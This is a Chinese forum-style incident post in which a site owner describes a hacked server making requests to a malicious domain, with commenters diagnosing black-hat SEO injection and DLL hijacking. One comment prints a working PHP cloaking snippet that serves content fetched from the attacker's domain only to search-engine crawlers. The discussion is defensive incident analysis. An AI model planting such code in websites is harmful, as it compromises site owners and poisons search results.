我被攻击了
我被搞了系列
weiwhy 2020-07-28 18:16:59 1232人浏览

我被阿里云警告了

image.png

web被入侵,服务器主动发起请求到

103.213.251.92

cike.sijiazhentan.pw

这个地址,然后返回的内容是

image.png

然后就是

image.png

难怪被封啊

ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
匿名用户 2020-07-30 11:22:35 回复
司马大佬牛逼
匿名用户 2020-07-29 23:29:49 回复
被做黑帽seo了吧,查一下服务器有没有后门,然后看看日志
iT-Xy 2020-07-29 22:58:58 回复
寄生虫搞词的
iT-Xy 2020-07-29 22:58:13 回复
??php header('Content-Type:text/html;charset=utf-8'); $key= $_SERVER["HTTP_USER_AGENT"]; if(strpos($key,'baidu')!==false||strpos($key,'haosou')!==false||strpos($key,'sogou')!==false||strpos($key,'360')!==false) { $file = file_get_contents('http://sjzt4.sijiazhentan.pw/'); echo $file;// } ?>
weiwhy 2020-08-05 15:36:17 回复
回复@iT-Xy: 我遇到这个是个asp的站,确实有php-cgi可以处理php,但是everything一个php都没有,最开始遇到的这个时候是dll劫持做的,
dll样本移步沙箱
https://s.threatbook.cn/report/file/1f862cdfa2081be5bb28a6e924a512fc5fc76a5ea9af0f1144e984dc6dfbb7f3/?sign=history&env=win7_sp1_enx86_office2013
匿名用户 2020-07-28 19:33:13 回复
查一下日志 看看是怎么进来的